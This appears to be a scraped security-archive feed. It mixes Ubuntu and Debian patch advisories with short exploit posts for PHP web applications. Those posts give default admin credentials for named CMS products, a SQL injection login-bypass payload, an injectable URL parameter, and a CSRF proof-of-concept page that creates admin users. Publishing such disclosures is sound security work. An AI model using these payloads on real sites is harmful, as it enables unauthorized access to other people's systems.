Sysdig Falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about Falco as a mix between snort, ossec and strace.

Falco 0.38.2

Ubuntu Security Notice 6966-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. It was discovered that Firefox did not properly manage certain memory operations when processing graphics shared memory. An attacker could potentially exploit this issue to escape the sandbox.

    ==========================================================================Ubuntu Security Notice USN-6966-1August 19, 2024firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2024-7518,CVE-2024-7521, CVE-2024-7524, CVE-2024-7526, CVE-2024-7527, CVE-2024-7528,CVE-2024-7529, CVE-2024-7530, CVE-2024-7531)It was discovered that Firefox did not properly manage certain memoryoperations when processing graphics shared memory. An attacker couldpotentially exploit this issue to escape the sandbox. (CVE-2024-7519)Nan Wang discovered that Firefox did not properly handle type check inWebAssembly. An attacker could potentially exploit this issue to executearbitrary code. (CVE-2024-7520)Irvan Kurniawan discovered that Firefox did not properly check an attributevalue in the editor component, leading to an out-of-bounds readvulnerability. An attacker could possibly use this issue to cause a denialof service or expose sensitive information. (CVE-2024-7522)Rob Wu discovered that Firefox did not properly check permissions whencreating a StreamFilter. An attacker could possibly use this issue tomodify response body of requests on any site using a web extension.(CVE-2024-7525)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  firefox                         129.0.1+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changesReferences:  https://ubuntu.com/security/notices/USN-6966-1  CVE-2024-7518, CVE-2024-7519, CVE-2024-7520, CVE-2024-7521,  CVE-2024-7522, CVE-2024-7524, CVE-2024-7525, CVE-2024-7526,  CVE-2024-7527, CVE-2024-7528, CVE-2024-7529, CVE-2024-7530,  CVE-2024-7531Package Information:  https://launchpad.net/ubuntu/+source/firefox/129.0.1+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6966-1

Ubuntu Security Notice 6837-2 - It was discovered that Rack incorrectly parsed certain media types. A remote attacker could possibly use this issue to cause Rack to consume resources, leading to a denial of service. This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. It was discovered that Rack incorrectly handled certain Range headers. A remote attacker could possibly use this issue to cause Rack to create large responses, leading to a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6837-2  
August 19, 2024

ruby-rack vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Several security issues were fixed in Rack.

Software Description:  
- ruby-rack: modular Ruby webserver interface

Details:

It was discovered that Rack incorrectly parsed certain media types. A  
remote attacker could possibly use this issue to cause Rack to consume  
resources, leading to a denial of service. This issue only affected  
Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2024-25126)

It was discovered that Rack incorrectly handled certain Range headers. A  
remote attacker could possibly use this issue to cause Rack to create  
large responses, leading to a denial of service. (CVE-2024-26141)

It was discovered that Rack incorrectly handled certain crafted headers. A  
remote attacker could possibly use this issue to cause Rack to consume  
resources, leading to a denial of service. (CVE-2024-26146)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
   ruby-rack                       2.1.4-5ubuntu1+  5  
                                   Available with Ubuntu Pro

Ubuntu 20.04 LTS  
   ruby-rack                       2.0.7-2ubuntu0.1+esm5  
                                   Available with Ubuntu Pro

Ubuntu 18.04 LTS  
   ruby-rack                       1.6.4-4ubuntu0.2+esm6  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   ruby-rack                       1.6.4-3ubuntu0.2+esm6  
                                   Available with Ubuntu Pro

Ubuntu 14.04 LTS  
   ruby-rack                       1.5.2-3+deb8u3ubuntu1~esm8  
                                   Available with Ubuntu Pro

After a standard system update you need to restart any applications using  
Rack to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6837-2  
   https://ubuntu.com/security/notices/USN-6837-1  
   CVE-2024-25126, CVE-2024-26141, CVE-2024-26146

Ubuntu Security Notice USN-6837-2

Debian Linux Security Advisory 5750-1 - Support for the "strict kex" SSH extension has been backported to AsyncSSH (a Python implementation of the SSHv2 protocol) as hardening against the Terrapin attack.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5750-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 18, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : python-asyncssh  
CVE ID         : CVE-2023-48795

Support for the "strict kex" SSH extension has been backported to  
AsyncSSH (a Python implementation of the SSHv2 protocol) as hardening  
against the Terrapin attack.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.10.1-2+deb12u1.

We recommend that you upgrade your python-asyncssh packages.

For the detailed security status of python-asyncssh please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/python-asyncssh

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbCSFYACgkQEMKTtsN8  
TjYCPg//Xp6xgrarHQyhfhbbdtC/54FhWnraTkQceDjQk66rTBc+aEdMIEhbytxc  
7cUGZ7M9HuoWJWHDxaIhm5m8yhrnwoX88R2trGACtD8Y7g/W/R5h0t8dEf0GWFZY  
pdr7XdciDrATQ9ogilWHacByKcVvetW+3uGDH3x992NMiZlRa4lB6jzQ5bkT3THA  
7gxsFDJWX2j0SXwrZM1oAISChTnup3pY1AStv2zuM9RyJOvpX6B9nVkRO/vQ5yqX  
VWus4cD/0KoIa8MuNCRAfZ/BB4nradLp4J/YdtmLNsRlc8wEePlSv1qCBpeyE65q  
VKQmagmLrvJd10HSNQvWcQxHWQJm0OWLOje0fDgKVrGg4Q/cx1JlwsJBjf6rskpU  
lnOaV+wlJE5FE9mc5Fx4jTOM0Q/KWJovldgK8ACGZGiVeaO6YUvoIUUgAlu8rcW0  
5Wk/EGv8gfy/T6jj8HIuMaudjhB/i7ig6QKNoptHeVnNluNriVpQp3bn2d140m1J  
SrZJ2j4LiSLwHhLKJx0D0Fdsd0ShqeJVr+LJsph7Iit8ym1KKl9OJgweZpDmcaPL  
9PAWM+cGza47s1az1o7wmKWkyNdw/IsMnZYaggJxr/0yEZKVE+wj+5rr+NWvw/de  
GoCGxpp6qhjxY9NdaCLjNhaxWHr/+Ed78sOpoajWAtOU4hrfjGs=  
=xeem  
-----END PGP SIGNATURE-----

Debian Security Advisory 5750-1

Lawyer CMS version 1.6 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Lawyer CMS 1.6 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/lawyer/                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/lawyer//adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Lawyer CMS 1.6 Insecure Settings

Karya Online Shopping Portal version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Karya Online Shopping Portal 2.0 auth by pass Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.shahsanjiv.com.np/                                                                                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/shopping/ADMIN/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Karya Online Shopping Portal 2.0 SQL Injection

JobSeeker CMS version 1.5 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : JobSeeker CMS 1.5 Insecure Settings Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/jobseeker/                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/jobseeker/adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

JobSeeker CMS 1.5 Insecure Settings

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

**Jobs Finder System 1.0 SQL Injection**

Posted Aug 19, 2024

Authored by indoushka

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 0e14944aabacd3bde55dc9ca768a85b25224b5d197aed3ef9cecb63e14d97575

Download | Favorite | View

**Jobs Finder System 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : jobs Finder System v1.0 SQL injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Jobs_Finder_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /jobs.php?id=3 <=== inject here[+] http://127.0.0.1/jobportal-master/jobs.php?id=3 [+]  Login : http://127.0.0.1/jobportal-master/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Jobs Finder System 1.0 SQL Injection

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Human Resource Management System 2024 1.0 Insecure Settings**

Posted Aug 19, 2024

Authored by indoushka

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | bf20205d0167adcb0c48749ed7a50372cba24a18938ecfb734926b5099542af1

Download | Favorite | View

**Human Resource Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = admin#123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Human Resource Management System 2024 1.0 Insecure Settings

Hotel Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Hotel Management System 1.0 CSRF Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip                 |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

  [+] Line 27 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">User Name:</label>  
        <input type="username" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/hotel/admin/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Latest News